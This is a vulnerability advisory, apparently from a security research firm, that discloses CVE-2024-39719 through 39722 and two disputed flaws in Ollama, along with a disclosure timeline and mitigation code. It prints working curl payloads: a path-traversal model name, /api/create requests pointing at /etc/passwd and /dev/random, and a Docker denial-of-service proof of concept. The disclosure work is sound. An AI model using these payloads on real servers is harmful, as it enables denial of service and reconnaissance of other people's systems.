TL;DR

Oligo’s research team recently uncovered 6 vulnerabilities in Ollama, one of the leading open-source frameworks for running AI models. Four of the flaws received CVEs and were patched in a recent version, while two were disputed by the application’s maintainers, making them shadow vulnerabilities.

Collectively, the vulnerabilities could allow an attacker to carry out a wide range of malicious actions with a single HTTP request, including Denial of Service (DoS) attacks, model poisoning, model theft, and more. With Ollama’s enterprise use skyrocketing, it is critical that development and security teams fully understand the associated risks and act urgently to ensure that vulnerable versions of the application aren’t being used in their environments.

- Ollama Background

- Our Findings

- CVE-2024-39720 - Out-of-bounds Read leading to Denial of Service (CWE-125)

- CVE-2024-39722 - File existence disclosure (CWE-22)

- CVE-2024-39719 - File existence disclosure (CWE-497)

- CVE-2024-39721 - Infinite Loops and Denial of Service (CWE-400)

- Model Poisoning (CWE-668)

- Model Theft (CWE-285)







- Internet Facing Servers

Ollama Background

Ollama is an open-source application that allows users to operate large language models (LLMs) locally on personal or corporate hardware. It is one of the most widely-used open-source projects for AI models, with over 93k stars on GitHub. Due to its simplicity, Ollama has quickly risen in popularity for enterprise use, as organizations look to benefit from the productivity gains delivered by LLMs.



When we started our research, Ollama had ~64K stars on GitHub. It is mostly used for local inference on CPUs, but it is also used by organizations around the world for cloud deployment of open-source and private models. Ollama is known to be robust, and it supports CPUs (x86, ARM), NVIDIA GPUs and Apple Metal out of the box (thanks to llama.cpp).

Now, only 3 months later, Ollama has 94K stars, a 46% increase!

In the figure above, we compare the GitHub stars of ollama, pytorch and llama.cpp (ollama’s core inference code) over time. Ollama is relatively new, but it has more stars than pytorch, and has even surpassed llama.cpp, the famous LLM inference codebase that Ollama is based on.

Our Findings

Oligo’s research team recently uncovered 6 vulnerabilities in the Ollama framework, with four patched in Version 0.1.47, and two shadow vulnerabilities that have been disputed by Ollama maintainers:

- CVE-2024-39722: Exposes the files that exist on the server on which Ollama is deployed, via path traversal in the /api/push route.

- CVE-2024-39721: Allows denial-of-service (DoS) attacks through the CreateModel API route via a single HTTP request.

- CVE-2024-39720: Enables attackers to crash the application through the CreateModel route, leading to a segmentation fault.

- CVE-2024-39719: Provides a primitive for checking file existence on the server, making it easier for threat actors to further abuse the application.

- Model Poisoning (CWE-668): A client can pull a model from an unverified HTTP source by using the /api/pull route if it lacks special authorization.

- Model Theft (CWE-285): A client can push a model to an unverified (HTTP) source by using the /api/push route as it lacks any form of authorization.

CVEs

1. CVE-2024-39720 - Out-of-bounds Read leading to Denial of Service (CWE-125)

URI: /api/create

Method: POST

User Interaction: None

Scope: Ollama <= 0.1.45 is vulnerable. Fixed in version 0.1.46.

Effect: Denial of Service



Technical Details: This vulnerability allows an attacker to use two HTTP requests to upload a malformed GGUF file containing just 4 bytes starting with the GGUF custom magic header. By leveraging a custom Modelfile that includes a FROM statement pointing to the attacker-controlled blob file, the attacker can crash the application through the CreateModel route, leading to a segmentation fault (signal SIGSEGV: segmentation violation).
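The bug class described above (reading past the end of a 4-byte file that only contains the magic bytes) can be illustrated with a defensive header parser. This is a minimal sketch, not Ollama's actual fix: it assumes the GGUF v2/v3 fixed header layout (magic, uint32 version, uint64 tensor count, uint64 metadata key/value count), and the function name `parse_gguf_header` is hypothetical.

```python
import struct

GGUF_MAGIC = b"GGUF"
# Assumed layout: magic (4 bytes), version (uint32), tensor count (uint64),
# metadata key/value count (uint64), all little-endian.
HEADER_FORMAT = "<4sIQQ"
HEADER_SIZE = struct.calcsize(HEADER_FORMAT)  # 24 bytes


def parse_gguf_header(data: bytes) -> dict:
    """Parse the fixed-size header, rejecting truncated or mislabeled input."""
    # Check the length before touching any field, so a file that holds
    # only the magic bytes is rejected instead of read out of bounds.
    if len(data) < HEADER_SIZE:
        raise ValueError(
            f"truncated GGUF header: got {len(data)} bytes, need {HEADER_SIZE}"
        )
    magic, version, tensor_count, kv_count = struct.unpack_from(HEADER_FORMAT, data)
    if magic != GGUF_MAGIC:
        raise ValueError("not a GGUF file")
    return {
        "version": version,
        "tensor_count": tensor_count,
        "metadata_kv_count": kv_count,
    }
```

With this check in place, the 4-byte payload `b"GGUF"` raises a `ValueError` rather than crashing the parser.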

References:

- https://github.com/ollama/ollama/server/routes.go:534

- https://github.com/ollama/ollama/server/routes.go:554

- https://github.com/ollama/ollama/server/routes.go:563

- https://github.com/ollama/ollama/compare/v0.1.45...v0.1.46#diff-782c2737eecfa83b7cb46a77c8bdaf40023e7067baccd4f806ac5517b4563131L417

2. CVE-2024-39722 - File existence disclosure (CWE-22)

URI: api/push

Method: POST

User Interaction: None

Scope: Ollama <= 0.1.45 is vulnerable. Fixed in version 0.1.46.

Description: Ollama exposes which files exist on the server on which it is deployed via path traversal in the api/push route.

Technical Details: When the api/push route is called with a path parameter that does not exist, the server reflects the escaped URI back to the attacker. This provides a primitive for probing file existence on the server and reveals the user that runs it, making it easier for threat actors to abuse the application further.

Example Payload: The example payload will expose the server directory structure via the HTTP response:

~/ curl http://127.0.0.1:11434/api/push -d '{"name": "../../../test../../../:../../../test../../../", "insecure": true, "stream": true}'

{"status":"retrieving manifest"}

{"status":"couldn't retrieve manifest"}

{"error":"stat /root/.ollama/models/manifests/registry.ollama.ai/library/latest: no such file or directory"}
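One way to close this kind of traversal is to validate every component of the model name before it is joined into a filesystem path. The sketch below is illustrative only and is not taken from Ollama's code: the allowed character set and the function name `is_safe_model_name` are assumptions.

```python
import re

# Hypothetical rule: each component starts with an alphanumeric character
# and may contain letters, digits, ".", "_" and "-".
_COMPONENT = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")


def is_safe_model_name(name: str) -> bool:
    """Return True if no component of `name` can act as a path traversal."""
    # Split on both "/" (path separators) and ":" (tag or port separators),
    # so every piece that could reach the filesystem is checked on its own.
    parts = re.split(r"[/:]", name)
    return all(
        _COMPONENT.match(part) is not None and ".." not in part
        for part in parts
    )
```

Under these rules `llama3:latest` passes, while the payload shown above is rejected because its components start with a dot or contain `..`.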

References:

3. CVE-2024-39719 - File existence disclosure (CWE-497)

URI: api/create

Method: POST

User Interaction: None

Scope: Not fixed, as of version 0.3.14.

Description: Ollama exposes which files exist on the server on which it is deployed.

Technical Details: When calling the CreateModel route with a path parameter that does not exist, Ollama reflects the “File does not exist” error to the attacker, providing a primitive for file existence on the server and making it easier for threat actors to abuse the application further.

The attacker controls the file path, and the os.Stat command output is reflected back to them.

~/ curl "http://localhost:11434/api/create" -d '{"name": "file-leak-existence","path": "/tmp/aasd.txt"}'

{"error":"error reading modelfile: open /tmp/aasd.txt: no such file or directory"}%

Examples:

Calling the endpoint with a file that does not exist:

- ~/ curl "http://localhost:11434/api/create" -d '{"name": "file-leak-existence","path": "/tmp/non-existing"}'

- {"error":"error reading modelfile: open /tmp/non-existing: no such file or directory"}%

- With a file that exists:

- ~/ curl http://localhost:11434/api/create -d '{"name": "file-leak-existence","path": "/etc/passwd"}'

- {"error":"command must be one of \"from\", \"license\", \"template\", \"system\", \"adapter\", \"parameter\", or \"message\""}%


- With a directory instead of file path:

- ~/ curl http://localhost:11434/api/create -d '{"name": "file-leak-existence","path": "/etc"}'

- {"error":"read /etc: is a directory"}%
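The three responses above are what make this an oracle: each error message maps to a different state of the requested path. A minimal sketch of that mapping follows, based only on the error strings shown in this section. The function name `classify_create_error` is hypothetical.

```python
def classify_create_error(error: str) -> str:
    """Map an /api/create error message to what it reveals about the path."""
    if "no such file or directory" in error:
        return "missing"
    if "is a directory" in error:
        return "directory"
    # Any other error (for example a Modelfile parse error) means the
    # server managed to open and read the file, so the file exists.
    return "file exists"
```

A fix would need to return the same generic error in all three cases, so that the response no longer distinguishes between them.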


References:

- https://github.com/ollama/ollama/releases/tag/v0.1.47

- https://github.com/ollama/ollama/blob/cb42e607c5cf4d439ad4d5a93ed13c7d6a09fc34/server/images.go#L349

4. CVE-2024-39721 - Infinite Loops and Denial of Service (CWE-400)

URI: api/create

Method: POST

User Interaction: None

Scope: Ollama <= 0.1.33 is vulnerable.

Description: Versions of Ollama before 0.1.34 are vulnerable to a denial-of-service (DoS) attack through the CreateModel API route with a single HTTP request.

Technical Details: The CreateModelHandler function uses os.Open to read a file until completion. The req.Path parameter is user-controlled and can be set to /dev/random, which is blocking, causing the goroutine to run infinitely (even after the HTTP request is aborted by the client). This leads to extensive resource consumption in a never-ending loop. Calling the api/create endpoint multiple times with these parameters increases CPU usage on the impacted machine to 80-90%, and repetitive calls to this endpoint will rapidly cause denial of service.
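The underlying problem, reading a user-chosen path to completion, can be avoided by refusing anything that is not a regular file and by capping how much is read. The following is a sketch of that idea in Python rather than Ollama's Go code. The size cap and the function name `read_modelfile` are assumptions made for illustration.

```python
import os
import stat

MAX_MODELFILE_BYTES = 1 << 20  # hypothetical 1 MiB cap, not an Ollama setting


def read_modelfile(path: str) -> bytes:
    """Read a Modelfile only if it is a regular file within the size cap."""
    # Device files such as /dev/random never reach end-of-file, so reject
    # everything that is not a regular file before opening it. (A stricter
    # version would re-check with os.fstat after opening to avoid a race.)
    if not stat.S_ISREG(os.stat(path).st_mode):
        raise ValueError(f"{path} is not a regular file")
    with open(path, "rb") as f:
        # Read one byte more than the cap to detect oversized files
        # without loading them in full.
        data = f.read(MAX_MODELFILE_BYTES + 1)
    if len(data) > MAX_MODELFILE_BYTES:
        raise ValueError(f"{path} exceeds {MAX_MODELFILE_BYTES} bytes")
    return data
```

Either check alone would stop the `/dev/random` payload. Together they also bound the memory a single request can consume.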

Example Payload:

~/ curl http://localhost:11434/api/create -d '{"name": "denial-of-service", "path": "/dev/random"}'

Or simply:

ollama serve &

curl "http://localhost:11434/api/create" -d '{"name": "dos","path": "/dev/random"}'

POC code:

Run Ollama in Docker:

docker run -p 11434:11434 --name ollama ollama/ollama

Trigger the DoS with a single client request:

curl "http://localhost:11434/api/create" -d '{"name": "dos","path": "/dev/random"}'

References:

- https://github.com/ollama/ollama/blob/9164b0161bcb24e543cba835a8863b80af2c0c21/server/routes.go#L557

- https://github.com/ollama/ollama/blob/adeb40eaf29039b8964425f69a9315f9f1694ba8/server/routes.go#L536

Disputed Vulnerabilities (Shadow Vulnerabilities)

Although we reported 6 vulnerabilities, Ollama’s maintainers acknowledged only 4 of them and disputed the other 2, responding:

… we do recommend folks filter which endpoints are exposed to end-users using a web application, proxy or load balancer …

In other words, not all endpoints are meant to be exposed by default. That is a dangerous assumption: not everybody is aware of it, and not everybody filters HTTP routing to Ollama. Currently, these endpoints are available through Ollama’s default port in every deployment, with no separation and no documentation to warn users.

5. Model Poisoning (CWE-668)

URI: api/pull

Method: POST

User Interaction: None

Scope: ollama <= 0.1.34

Description: Model Poisoning via the api/pull route from an untrusted source.

Technical Details: A client can pull a model from an unverified (HTTP) source by using the /api/pull route if it lacks special authorization (vulnerable by default). An attacker can trigger the server to pull a model from an attacker-controlled server. This also widens the attack surface for file uploads: continuous calls to this endpoint will download models until the disk is full, potentially leading to denial of service (DoS).

Example Payload:

curl http://127.0.0.1:11434/api/pull -d '{

"name": "any-name"

}'

References:

6. Model Theft (CWE-285)

URI: /api/push

Method: POST

User Interaction: None

Scope: ollama <= 0.1.34

Description: Model Theft in the api/push route to an untrusted target.

Technical Details: A client can push a model to an unverified (HTTP) source by using the /api/push route, as it lacks any form of authorization or authentication. This primitive enables attackers to steal every model stored on the server (and upload it to a third-party server) using a single HTTP request. Models are intellectual property, and for AI companies they can be a key competitive advantage. Many Ollama users deploy private models that are not on the ollama.com/models hub.

Example Payload:

An /api/push HTTP request with "insecure": true and an attacker-controlled server will push the model to an untrusted, attacker-controlled destination.

For comparison, TorchServe and Triton Inference Server both run the management service on a different port. We hope Ollama will do the same eventually - move the management endpoints to a different port. By separating the management routes, users that deploy with default configuration (and are unaware of the unsafe defaults that are not highlighted in the docs) will be less exposed to risks associated with these endpoints. We believe that only inference endpoints should be exposed by default. Many Ollama users are deploying the service as is, using the unsafe defaults.
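The separation argued for above can be approximated today by the filtering the maintainers recommend: a proxy in front of Ollama that forwards inference routes only. The sketch below shows just the allowlist decision such a proxy would make. The choice of routes and the name `should_forward` are assumptions, and a real deployment would implement this in its proxy or load balancer configuration.

```python
# Hypothetical allowlist: inference-only routes that a proxy would forward.
INFERENCE_ROUTES = {
    ("POST", "/api/generate"),
    ("POST", "/api/chat"),
    ("POST", "/api/embeddings"),
}


def should_forward(method: str, path: str) -> bool:
    """Return True only for requests that match an allowlisted route."""
    # Drop any query string and compare the exact path. Everything else,
    # including /api/create, /api/pull and /api/push, is denied by default.
    clean_path = path.split("?", 1)[0]
    return (method.upper(), clean_path) in INFERENCE_ROUTES
```

Deny-by-default matters here: a new management route added in a later release stays blocked until someone deliberately allows it.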

Internet Facing Servers

To assess the risk of these vulnerabilities being exploited in the wild, we tried to estimate how many vulnerable servers are exposed to the internet at the time of writing.

To create a distribution of the deployed versions on the internet, we sent HTTP requests to the public servers via [host:port]/api/version endpoint, which returns the versions of the installed Ollama servers as part of the response.
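The same check can be run against servers you own. The sketch below classifies the body returned by /api/version against a chosen fixed release. It assumes the response is JSON of the form {"version": "0.1.34"}, and the function names are hypothetical. Fetching the body is left out so that the example stays offline.

```python
import json
import re


def parse_version(text: str) -> tuple:
    """Turn a version string such as "0.1.34" into a comparable tuple."""
    # Only the numeric major.minor.patch prefix is compared. Suffixes such
    # as "-rc1" are ignored in this sketch.
    match = re.match(r"^v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not match:
        raise ValueError(f"unrecognized version: {text!r}")
    return tuple(int(part) for part in match.groups())


def is_older_than(version_response: str, fixed_in: str) -> bool:
    """Check the JSON body of /api/version against a fixed release."""
    reported = json.loads(version_response)["version"]
    return parse_version(reported) < parse_version(fixed_in)
```

For example, `is_older_than('{"version": "0.1.34"}', "0.1.46")` flags a server that predates the release named in this advisory as containing the fixes.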

At the time of writing, around 10K unique internet-facing IPs run Ollama. One in four of these internet-facing servers is vulnerable to the issues uncovered by the Oligo research team.

In June 2024, Wiz Research disclosed Probllama (CVE-2024-37032), a vulnerability that enables remote code execution on Ollama servers running versions before 0.1.34.

Exposing Ollama to the internet without authorization is equivalent to exposing the Docker socket to the public internet, because Ollama can upload files and has model pull and push capabilities that can be abused by attackers.

IoCs

Special Thanks

We would like to thank Ollama’s maintainers, who were highly cooperative and fixed our findings quickly. Thank you for the amazing product you have built. We would also like to thank all previous Ollama security researchers for their responsible disclosures and keeping the community secure.

Responsible Disclosure Timeline

Oligo identified the vulnerabilities when Ollama’s latest release was v0.1.34 (released on May 7, 2024).

- May 18, 2024 - Initial report of 6 vulnerabilities

  - Oligo provided a full security report to Ollama’s maintainers.

  - Ollama’s maintainers responded with a PGP key.

  - Oligo encrypted the security report to Ollama’s maintainers.

- May 21, 2024 - Follow-up by Oligo

- May 21, 2024 - Ollama confirmed 4 out of the 6 vulnerabilities and started to work on a fix.

- Jun 4, 2024 - Follow-up by Oligo

- Jun 9, 2024 - Ollama fixed the DoS vulnerabilities in Ollama Server (patched in release 0.1.46).

- Jun 26, 2024 - Oligo asked MITRE to issue CVEs for the 4 vulnerabilities.

- Jun 28, 2024 - MITRE issued CVEs: CVE-2024-39720, CVE-2024-39721, CVE-2024-39722, CVE-2024-39719

- Aug 16, 2024 - End of responsible disclosure (90 days since initial report)

- Oct 30, 2024 - Oligo published this advisory.